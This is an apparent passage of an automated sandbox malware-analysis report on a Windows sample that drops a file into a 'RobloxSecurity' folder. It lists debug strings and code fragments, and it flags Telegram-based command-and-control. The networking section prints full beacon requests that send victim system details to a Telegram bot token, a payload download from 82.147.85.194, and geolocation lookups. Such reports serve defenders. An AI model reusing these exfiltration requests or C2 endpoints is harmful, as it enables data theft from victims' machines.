                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: jqOHOuPMJP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\system32\rsaenh.dll.pdb| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
                  Source: Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981888h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98016Dh
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98B834h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9775FCh
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981FA1h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D1B7h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98E899h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D1B7h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9745F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D197h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97CA9Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97CC93h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B980CADh
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98B814h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97EA38h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981F81h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98E879h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D197h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9745F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97771Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B984622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9845F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B984622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98771Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B96771Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B994622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9945F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B99730Ch

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.4:49738 -> 185.119.118.59:8080
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 82.147.85.194 82.147.85.194
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: ip-api.com
